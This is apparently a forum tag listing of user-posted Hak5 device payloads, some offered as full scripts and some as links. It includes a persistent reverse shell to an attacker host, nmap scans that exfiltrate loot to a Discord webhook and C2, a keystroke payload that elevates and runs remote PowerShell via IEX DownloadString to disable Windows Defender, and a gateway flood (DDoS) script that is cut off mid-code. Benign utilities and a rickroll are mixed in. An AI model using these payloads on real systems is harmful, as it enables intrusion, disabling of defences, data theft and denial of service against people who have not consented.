
Showing results for tags 'payload'.


  1. Windows Persistent Reverse Shell for Bash Bunny

     Author: 0dyss3us (KeenanV)
     Version: 1.0

     Description

     Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.

     - Targets Windows 10 (working on support for older versions)
     - Connection can be closed and reconnected at any time
     - Deploys in roughly 15-20 sec
     - Works with NetCat

     Requirements

     Have a working Bash Bunny :)

     STATUS

     LED                     STATUS
     Purple                  Setup
     Amber (Single Blink)    Installing and running scripts
     Green                   Finished

     Installation and Execution

     - Plug in Bash Bunny in arming mode
     - Move files from WindowsPersistentReverseShell to either switch folder
     - Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?)
     - Save the persistence.vbs file
     - Unplug Bash Bunny and switch it to the position the payload is loaded on
     - Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
     - Unplug the Bash Bunny and go to attacker's machine
     - Listen on the port you chose in the persistence.vbs file on NetCat
       - Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs)
       - If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe.
     - Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
     - Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in

     Download

     Click here to download
  2. Topic for discussions around Network reconnaissance payload for Shark Jack. Network reconnaissance payload for Shark Jack Swiss knife network reconnaissance payload with options for loot capturing (e.g. DIG, NMAP, IFCONFIG, ARP-SCAN, LLDP), notification (e.g. Homey, Pushover (the best push notifications service!), Slack), exfiltration (e.g. Cloud C2, Pastebin, Slack) and led blinking for IP address. Payload is based on various sample payloads from HAK5, MonsieurMarc, Topknot and others. The script has been created in a modular fashion which allows easy extending the script with new functions (e.g. recon, notification or exfiltration functions). The script furthermore incorporates logic to determine already existing loot folders and create a new (unique) loot folder every time the script is executed. Payload can be found here: https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Network-Recon-framework-payload-with-logging-notification-and-exfiltration
  3. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled) This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) payload.sh #!/bin/bash # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled) # Author: REDD of Private-Locker # Version: 1.3 # # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, # It scans the local subnet for any online devices. - While also logging the Public IP of the # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) # # Magenta w/ Yellow ........Waiting for Internet # 1st Yellow flashing.......Scanning for Gateway/Subnet # Cyan flashing.............Running Nmap scan on x.0/24 # 2nd Yellow Flashing.......Installing dependencies for Discord Integration # Yellow....................Sent to Discord Webhook # Blue......................Exfiltrating to C2 # Red.......................Failed C2/EXFIL/Scanning # Green.....................Finished # Turn on Discord Integration (Yes = 1, No = 0) DISCORD=0 WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE' # Send Loot as File or Plain Messages (File = 1, Messages = 0) AS_FILE=0 if [ -f "/etc/device.config" ]; then INITIALIZED=1 else INITIALIZED=0 fi LED SETUP NETMODE DHCP_CLIENT while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done URL="http://www.example.com" while ! 
wget $URL -qO /dev/null; do sleep 1; done GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') while [ $GET_GATEWAY == "" ]; do sleep 1; done INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p') SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}') CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3) FIN_SUB="${CHK_SUB}.0/24" LED ATTACK; if [ "$SUBNET" != "$FIN_SUB" ]; then LED R FAST; sleep 2; LED R SOLID; else # Fix for Timestamp Update ntpd -gq; sleep 1; DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S') LOOT_DIR="/root/loot/nmap-diag" LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt" if [ ! -d "$LOOT_DIR" ]; then mkdir -p "$LOOT_DIR" fi if [ ! -f "$LOOT_FILE" ]; then touch "$LOOT_FILE" fi # Get Public IP and run NMAP scan PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -) printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE" LED C VERYFAST run_nmap () { nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE" } run_nmap & PID=$! while kill -0 "$PID" 2>&1 >/dev/null; do wait $PID done if [ -s "$LOOT_FILE" ]; then if [ "$DISCORD" == 1 ]; then CURL_CHK=$(which curl) if [ "$CURL_CHK" != "/usr/bin/curl" ]; then LED Y VERYFAST; opkg update;opkg install libcurl curl; fi LED Y SOLID if [ "$AS_FILE" == 1 ]; then FILE=\"$LOOT_FILE\" curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK fi if [ "$AS_FILE" == 0 ]; then while read -r line; do DISCORD_MSG=\"**$line**\" curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK done < "$LOOT_FILE" fi LED G SOLID;sleep 2; fi if [ "$INITIALIZED" == 1 ]; then LED Y SOLID if [ -z "$(pgrep cc-client)" ]; then C2CONNECT while ! 
pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done fi # Re-issuing C2CONNECT to verify loot push to C2 C2CONNECT sleep 2 C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}" LED M VERYFAST; sleep 2; fi LED FINISH; else LED R SOLID; rm -rf "$LOOT_FILE"; fi fi
  4. My first payload, wanted to make something simple and cross-platform to try and learn the platform. Please give any feedback (I can't test on OSX myself) you may have to help me improve my payload writing!

     Features I'm looking to add that I need help with in a future version:
     - Loop so that the video opens multiple times before ending payload
     - Ability to crank up device volume while executing payload

         ######## INITIALIZATION ########
         LED SETUP
         # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
         ATTACKMODE RNDIS_ETHERNET
         #ATTACKMODE ECM_ETHERNET

         ######## ATTACK PHASE (WINDOWS RUN PROMPT) ########
         # Use this version if user cannot use CMD (lacking perms or something similar)
         LED ATTACK
         # Open run prompt
         Q GUI r
         Q DELAY 200
         # Open web browser
         Q STRING microsoft-edge://
         #Q STRING chrome
         Q ENTER
         Q DELAY 100
         # Enter RickRoll link & enter it
         Q STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
         Q ENTER

         ######## ATTACK PHASE (WINDOWS CMD) ########
         #LED ATTACK
         # Open CMD
         #Q GUI r
         #Q DELAY 200
         #Q STRING cmd
         #Q DELAY 100
         #Q ENTER
         #Q DELAY 100
         # Opens default web browser with video, cleans up cmd window
         #Q STRING start https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit
         #Q ENTER

         ######## ATTACK PHASE (OSX / *nix) ########
         #LED ATTACK
         #Q GUI SPACE
         #Q DELAY 200
         #Q STRING terminal
         #Q DELAY 100
         #Q ENTER
         #Q DELAY 1000
         #Q GUI n
         #Q DELAY 1000
         #Q STRING open https://www.youtube.com/watch?v=dQw4w9WgXcQ && exit

         ######## FINISH ########
         LED FINISH

     Github link: https://github.com/GlitchingGogo/BashBunny-SimpleRickRoll
  5. ok, so I'm new to this, but if I want to combine a couple of the payloads that's available at hak5 GitHub, can I for example make one payload that has wifi connect payload and the open ap Nmap my thought was to copy the payloads into a single payload and make the individual payload a function! Any tips or tricks would be nice! My goal is that if it connects to a specific network when it boots up, it will dump the loot to C2, but if it doesn't connect, it will automatically start the Open AP Nmap Scan this is what I have so far: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #!/bin/bash # This is a test to see if my network is in range, it will connect home and export the loot to C2 # if my network is out of range or can't connect to it, it will do the Open AP Attack! # Title: Simple WiFi Connection Example # Author: Hak5Darren # Version: 1.0 function Home() { # WiFi Client Setup WIFI_SSID="SSID" WIFI_PASS="Password" LED SETUP WIFI_CONNECT # optionally start SSH server # /etc/init.d/sshd start LED ATTACK C2CONNECT && C2EXFIL } function OpenAP() { # Title: Open AP Nmap Scanner # Author: Hak5Darren # Version: 1.0 # # Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder # # LED SETUP: Scanning # LED ATTACK: Connected, running nmap scan # # See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery. 
NMAP_OPTIONS="-sP" LOOT_DIR=/root/loot/open_ap_nmap_scan MAX_CIDR=20 DEBUG=1 function scan_wifi() { [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log iwlist wlan0 scan > /tmp/wifi_scan cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open total_aps=$(cat /tmp/open | wc -l) [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log } function check_ap() { current_ap=$(sed -n "$on"p /tmp/open) [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1) [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log else connect_wifi scan_network fi } function connect_wifi() { LED STAGE1 [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log ifconfig wlan0 down iwconfig wlan0 mode Managed essid "$current_ap" ifconfig wlan0 up while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log udhcpc -i wlan0 while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'}) [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log } function scan_network() { LED STAGE2 find_subnet [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log CIDR=$(echo $SUBNET | cut -d '/' -f 2) [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log if 
[ "$CIDR" -ge "$MAX_CIDR" ] then [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null else [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log fi echo $APMAC >> /tmp/nmap_scanned } function find_subnet() { SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') [[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log } function run() { while true; do setup scan_wifi while [ "$on" -le "$total_aps" ] do if [ "$on" -ge 1 ]; then check_ap; fi let on=on+1 done sleep 5 [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log done } function setup() { LED SETUP mkdir -p $LOOT_DIR touch /tmp/nmap_scanned on=0 killall wpa_supplicant } # Run payload run } Home && poweroff || OpenAP
  6. Is it possible to make a rubber ducky open a new cmd window with admin privileges? (without the privileges yourself) (Please put the code in the comments if you can)
  7. Topic for discussions around Backup and Restore shell scripts for Shark Jack. Backup and Restore shell scripts for Shark Jack Being tired of having to re-image your Shark Jack and going through the hassle of backing up and restoring the device? These shell scripts will help you to backup and restore all important data on your Shark Jack. The scripts have been created in a modular fashion which allows easy extending the scripts with new functions. The backup script (backup.sh) incorporates logic to determine already existing backup folders and create a new (unique) backup folder every time the script is executed. Shell scripts can be found here: https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/util/Backup-and-Restore-scripts-with-logging-and-notification
  8. SharkLib - SharkJack Quick Payload Library This Tool was created less than 24 hours after having a "SharkJack", I realized how much of a pain it is to swap back and forth between prior loaded Payloads. So after 7 hours of debugging, testing, and pulling my hair out. - I give to you "SharkLib". SharkLib allows you to Backup/Restore prior loaded Payloads, via SSH Terminal. No more needing to have to "go deploy another script", you can easily use C2 or any SSH Terminal Service to switch your desired payloads. Features: Installs to Local System to allow ease of access of "SharkLib". (/usr/sbin) Syncs on Exit to prevent data corruption in payloads. Easy to use Menu Interface. Switch payloads in seconds with SSH. I will post the Code in here, until Hak5 tells me what "category" this tool falls under in the GitHub Repo. The Code: #!/bin/bash # # Title: SharkLib # Author: REDD of Private-Locker # Version: 1.3 # # This Script is to be ran on the Hak5 SharkJack itself. This Script # makes switching between local stored payloads quick and simple. # VERS=1.3 LIB_DIR="/root/payload/sharklib" DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" START_DIR="$DIR" INSTALL_DIR="/usr/sbin" EXEC_FILE="sharklib" PAYLOAD_DIR="/root/payload" PAYLOAD_FILE="$PAYLOAD_DIR/payload.sh" function install_sharklib() { if [[ "$DIR" != $INSTALL_DIR ]]; then if [ ! 
-f "$INSTALL_DIR/$EXEC_FILE" ]; then printf " -> Installing SharkLib into System for Easy Access.\n" sleep 1; cp -rf $0 $INSTALL_DIR/$EXEC_FILE printf " -> Fixing Permissions of $EXEC_FILE in $INSTALL_DIR.\n" sleep 1; chmod +x $INSTALL_DIR/$EXEC_FILE fi fi } function view_payload() { printf "\n"; cat "$PAYLOAD_FILE"; printf "\n"; read -n 1 -s -r -p "Press any key to return to Menu.."; sharklib_menu; } function remove_sharklib() { if [ -f "$INSTALL_DIR/$EXEC_FILE" ]; then printf "\n" printf "Removing SharkLib from local system.\n" rm -rf "$INSTALL_DIR/$EXEC_FILE"; printf "Removing SharkLib Payload Library.\n" rm -rf "$LIB_DIR"; printf "SharkLib has been fully removed.\n\n" fi } function free_space() { FREE_MEM="$(df -h $PWD | awk '/[0-9]%/{print $(NF-2)}')" } function header() { free_space; printf "\n" printf "O========================================O\n" printf "| SharkLib - SharkJack Quick Payload |\n" printf "| Library |\n" printf "O=O====================================O=O\n" printf " | %-29s |\n" "$SHARKLIB_TITLE" printf " O====================================O\n" printf " | Free Space: %-6s Vers: %-3s | \n" "$FREE_MEM" "$VERS" printf " O================================O \n" printf " -Huge Thanks goes to Hak5! \n" printf "\n" } function backup_payload() { clear; SHARKLIB_TITLE=" Backup Payloads" header; if [ -f "$PAYLOAD_FILE" ]; then printf "\n" printf " 1. Backup current payload to SharkLib\n" printf "\n" printf " 2. Return to Previous Menu.\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read BACKUP_INPUT printf "\n" if [ "$BACKUP_INPUT" = "1" ]; then printf " What would you want to call this Payload?: " read BACKUP_INPUT_1 if [[ "$BACKUP_INPUT_1" != "" ]]; then if [ ! 
-d "$LIB_DIR/$BACKUP_INPUT_1" ]; then mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" printf " Created Payload directory named $BACKUP_INPUT_1\n" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $BACKUP_INPUT_1\n" rm -rf "$LIB_DIR/$BACKUP_INPUT_1" mkdir -p "$LIB_DIR/$BACKUP_INPUT_1" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/$BACKUP_INPUT_1/payload.sh" sleep 2; sharklib_menu; fi else if [ ! -d "$LIB_DIR/Payload" ]; then printf " Backing up Payload into Default Payload directory..\n" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; else printf " Removing Old Copy and using New Copy of $LIB_DIR/Payload\n" rm -rf "$LIB_DIR/Payload" mkdir -p "$LIB_DIR/Payload" cp -rf "$PAYLOAD_FILE" "$LIB_DIR/Payload/payload.sh" sleep 2; sharklib_menu; fi fi elif [ "$BACKUP_INPUT" = "2" ]; then sharklib_menu; else backup_payload; fi else printf " No Payload in $PAYLOAD_DIR.\n" fi } function delete_payload() { DELETE_INPUT=NULL clear; SHARKLIB_TITLE=" Delete Payloads" header; cd "$LIB_DIR" DIR_CNT="NULL" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Delete. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read DELETE_INPUT printf "\n" if [[ "$DELETE_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$DELETE_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif ! 
[[ "$DELETE_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; delete_payload; elif [[ "$DELETE_INPUT" -le "$PLUS_QUIT" ]]; then printf " Deleting payload ${DIRS[$DELETE_INPUT]} from SharkJack. \n" rm -rf "$LIB_DIR/${DIRS[$DELETE_INPUT]}" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function restore_payload() { LOAD_INPUT=NULL clear; SHARKLIB_TITLE=" Restore Payloads" header; cd "$LIB_DIR" DIR_CNT=$(ls "$LIB_DIR" | grep -v total | wc -l) declare -a DIRS i=1 for d in */; do DIRS[i++]="${d%/}" done if [ "$DIR_CNT" -lt "1" ]; then printf " There are no Payloads to Restore. \n\n" printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; fi printf " There are ${#DIRS[@]} Payloads in SharkLib:\n" for((i=1;i<=${#DIRS[@]};i++)); do printf " %2d. %-20s\n" "$i" "${DIRS[i]}" done PAYLOAD_TOTAL=${#DIRS[@]} PLUS_QUIT=$((PAYLOAD_TOTAL+1)) printf "\n" printf " %2d. %-20s\n" "$PLUS_QUIT" "Return to Previous Menu." printf "\n" printf " Please choose a Payload by Number: " read LOAD_INPUT printf "\n" if [[ "$LOAD_INPUT" == "$PLUS_QUIT" ]]; then printf " Returning to Previous Menu.\n" sleep 2; sharklib_menu; elif [[ "$LOAD_INPUT" == "" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif ! [[ "$LOAD_INPUT" =~ ^[0-9]+$ ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" == "0" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -gt "$PLUS_QUIT" ]]; then printf " Please Input a choice.\n" sleep 2; restore_payload; elif [[ "$LOAD_INPUT" -le "$PLUS_QUIT" ]]; then printf " Loading payload ${DIRS[$LOAD_INPUT]} to SharkJack. 
\n" cp -rf "$LIB_DIR/${DIRS[$LOAD_INPUT]}/payload.sh" "$PAYLOAD_FILE" cd "$START_DIR" sleep 2; sharklib_menu; else printf " Wrong Choice, going back to Previous Menu.\n" cd "$START_DIR" sleep 2; sharklib_menu; fi } function cleanup_ctrl { echo -en "\n -> Caught SIGINT! \n" printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit $? } function exit_sharklib() { printf " -> Cleaning up and Exiting..\n\n" sync sleep 1; exit 0; } function sharklib_menu() { clear; trap cleanup_ctrl SIGINT trap cleanup_ctrl SIGTERM MENU_INPUT=NULL if [ ! -d "$LIB_DIR" ]; then printf " -> Creating SharkLib Payload Library directory.\n" mkdir -p "$LIB_DIR" fi cd "$LIB_DIR" SHARKLIB_TITLE=" By REDD" header; printf " 1. Backup Payload to SharkLib\n" printf " 2. Restore Payload from SharkLib\n" printf " 3. Delete Payload from SharkLib\n" printf "\n" printf " 4. View Current Payload on SharkJack\n" printf "\n" printf " 5. Exit\n" printf "\n" printf " Select a Menu Item by # and press ENTER: " read MENU_INPUT printf "\n" if ! [[ "$MENU_INPUT" =~ ^[0-9]+$ ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "0" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" = "1" ]]; then backup_payload; elif [[ "$MENU_INPUT" = "2" ]]; then restore_payload; elif [[ "$MENU_INPUT" = "3" ]]; then delete_payload; elif [[ "$MENU_INPUT" = "4" ]]; then view_payload; elif [[ "$MENU_INPUT" = "5" ]]; then exit_sharklib; elif [[ "$MENU_INPUT" -ge "6" ]]; then sharklib_menu; elif [[ "$MENU_INPUT" == "" ]]; then sharklib_menu; else sharklib_menu; fi } if [ "$1" == "--install" ]; then install_sharklib; exit 0; elif [ "$1" == "--remove" ]; then remove_sharklib; else install_sharklib; sharklib_menu; fi Suggestions are always welcome! Huge Thanks to Hak5 for the wonderful gear! REDD (Ar1k88)
  9. GIve-Me-My-iP (GIMMP) This payload is used to force the SharkJack on to Static LAN's. Main Scenario - DHCP is disabled or not present on the LAN, only Static IP Devices. The Payload uses ARP-Scan to scan a Array of Subnets to determine if ANY devices are on those subnets. - If so connect to the last known network with devices and set the IP of the SharkJack to the Subnet and Last Digits you assign in the payload. Enjoy. NOTE: This payload requires the Router/LAN to have ARP Scanning enabled. Some Routers/LAN's do not have this feature enabled. The Code: #!/bin/bash # # Title: GIve-Me-My-iP! (GIMMP) # Author: REDD of Private-Locker # Version: 1.0 # # Description: This payload will determine if DHCP is enabled # on the LAN. - If not, it will scan a List of Common Network # Subnets for any Static IP Devices using ARP-scan. Once a valid # IP is found. It will set the SharkJack to the subnet of the last # detected Network in the log file with the ending IP digits. # # LED SETUP (Magenta) - Setting up Variables and enviroment # LED Yellow thru Magenta - Waiting to be plugged in # LED Cyan thru Magenta - Scanning Subnets for Static IP Devices # LED Green Blinking - DHCP found # LED Green SOLID - IP Address found and set to SharkJack # LED Red SOLID - Payload failed, No IP addresses detected # LED FINISH (Green) - Payload completed # # Ending IP digits of the SharkJack. SET_IP="250" # Source IP that the ARP-Scan will come from. FAKE_SRC="192.168.133.7" # Packet Rate for ARP-Scan. BANDWIDTH="100000" # Temp log file for output of script. TMP_LOG="temp.log" # Determine if SharkJack gets IP. while ! ifconfig eth0; do LED M SOLID;sleep .8;LED Y SOLID;sleep .2; done NETMODE DHCP_CLIENT; LED M SOLID; sleep 5; IP="$(ip route list dev eth0 | awk ' /^default/ {print $3}')" # Verify variable to compare SharkJack IP. 
VERIFY="^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$" function cleanup() { if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; fi } function scan_networks() { NETWORKS=( '192.168.0.0/24' '192.168.1.0/24' '192.168.2.0/24' '192.168.10.0/24' '192.168.100.0/24' '172.16.0.0/24' '172.16.1.0/24' '172.16.2.0/24' '172.16.10.0/24' '172.16.24.0/24' '10.0.0.0/24' '10.0.1.0/24' '10.0.2.0/24' '10.0.10.0/24' '10.10.0.0/24' '10.10.1.0/24' '10.10.2.0/24' '10.10.10.0/24' '10.100.0.0/24' '10.100.1.0/24' '10.100.2.0/24' '10.100.10.0/24' ) for i in "${NETWORKS[@]}"; do LED M SOLID; arp-scan --arpspa $FAKE_SRC -g -B $BANDWIDTH -I eth0 ${i} >> $TMP_LOG LED Y SOLID; sleep .2; done LED M FAST; LAST_IP=$(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" $TMP_LOG | tail -1 | cut -d"." -f1-3) if [ "$LAST_IP" != "" ]; then SHARKJACK_IP="${LASTIP}.${SET_IP}" ifconfig eth0 ${SHARKJACK_IP}/24 up CURRENT_SUBNET="${LAST_IP}" CURRENT_GW=$(ip route list dev eth0 | awk ' /^default/ {print $3}') LED G SOLID; else # If no LAN detected, exit. LED R SOLID; exit 1; fi } # Start the script. If Valid IP, continue script. - If not lets scan some networks! if [ -f "$TMP_LOG" ]; then rm -rf $TMP_LOG; else touch $TMP_LOG; fi if [[ "$IP" =~ $VERIFY ]]; then # Gateway found. Continuing script. LED G FAST; sleep 1; elif [ -z "$IP" ]; then # No Gateway found (Blank Gateway Variable) NETMODE TRANSPARENT; scan_networks; elif [ "$IP" == "172.16.24.1" ]; then # Added to detect if the SharkJack remains on the current Arming Mode IP. NETMODE TRANSPARENT; scan_networks; else # Exiting with exit code 1. LED R SOLID; exit 1; fi # Final Cleanup. cleanup; # Run your SCAN's here.. OR ... if you have Internet Tester Payload backed up in SharkLib LED FINISH SHARKLIB="/root/payload/sharklib" PAYLOAD="${SHARKLIB}/'Internet Tester'/payload.sh" if [ -d "$SHARKLIB" ]; then source $PAYLOAD; fi Changelog: 1.1 - Initial Release
  10. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  11. Flood Gateway (DDoS) This Payload was created to have a automated way to stress test a Router/Gateway at any given moment. Currently it can use SYN/ACK/RST/UDP/BlackNurse/XMAS and SlowLoris Attacks. This potentially DDoS's the connected Gateway to determine if the Router/Gateway can handle being attacked internally. (And other reasons.... 😉) The Code: #!/bin/bash # # Title: Flood Gateway (DDoS) # Author: REDD of Private-Locker # Version: 1.2 # # Description: This payload detects the Gateway IP then proceeds to # flood the Gateway IP by sending SYN/ACK/RST/UDP Packets or using # SLOWLORIS/BlackNurse/XMAS Attacks. (More options to come) # # Common Ports to Attack: 80 (TCP), 8080(TCP), 53 (UDP), 3389 (TCP), the # rest is up to you. # # Defaults to SYN Attack. # # LED SETUP (Magenta) Setting NETMODE and detecting GW IP. # LED Yellow thru Magenta Waiting Ethernet Plug connection. # LED White thru Magenta Waiting Connection to Public Website. # LED Red Blink No Gateway IP Address, waiting 15 seconds. # LED Red Solid No Gateway IP Address, exiting script. # LED Cyan Blink to Solid Connected to C2. (Optional) # LED Yellow thru Green Attacking Gateway IP with Hping3. # LED Green Solid Attack has Finished. # # NOTE: SLOWLORIS Attack does NOT use the DURATION Variable. It runs until # connections/resources run out. # # BlackNurse Attack does NOT use the PORT Variable. It runs against the # ICMP(Ping) port. # # Type of Attack to perform. ATTACK="SYN" # Port to Attack. PORT="80" # Amount of time you wish to DDoS your Gateway. (Hint: 600 seconds is 10 minutes) DURATION="30" # Turn to YES if you want to connect to C2 BEFORE Attack. C2_CONNECTION="YES" ## Settings for SLOWLORIS Attack. (Only supports HTTP Attack, NOT SSL - HTTPS) HTTP_CONNECTIONS="200" TEST_URL="http://www.google.com" # Start the Script! Man your Stations! LED SETUP; NETMODE DHCP_CLIENT; function net_connect() { while ! 
